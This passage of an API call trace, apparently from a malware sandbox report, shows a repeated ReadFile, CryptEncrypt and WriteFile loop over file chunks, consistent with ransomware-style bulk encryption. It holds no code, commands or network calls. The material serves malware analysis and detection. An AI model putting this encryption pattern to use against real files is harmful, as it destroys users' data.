lpOverlapped=0x0) returned 1 [0262.143] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.143] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.143] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.143] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.143] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.143] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.143] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.143] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.143] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.143] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.143] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.143] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.143] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.143] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.144] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.144] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.144] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.144] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.144] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.144] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.144] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.144] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.144] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.144] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.144] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.144] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.144] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.144] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.144] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.144] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.145] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.145] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.145] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.145] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.145] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.145] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.145] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.145] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.145] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.145] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.145] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.145] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.145] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.146] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.146] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.146] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.146] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.146] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.146] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.146] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.146] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.146] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.146] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.146] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.146] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.146] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.146] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.146] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.146] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.146] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.146] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.146] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.147] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.147] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.147] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.147] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.147] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.147] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.147] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.147] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.147] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.147] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.147] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.147] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.147] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.147] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.147] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.147] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.148] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.148] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.148] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.148] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.148] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.148] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.148] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.148] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.148] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.148] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.148] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.148] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.148] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.148] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.148] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.148] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.149] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.149] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.149] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.149] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.149] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.149] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.149] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.149] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.149] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.149] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, 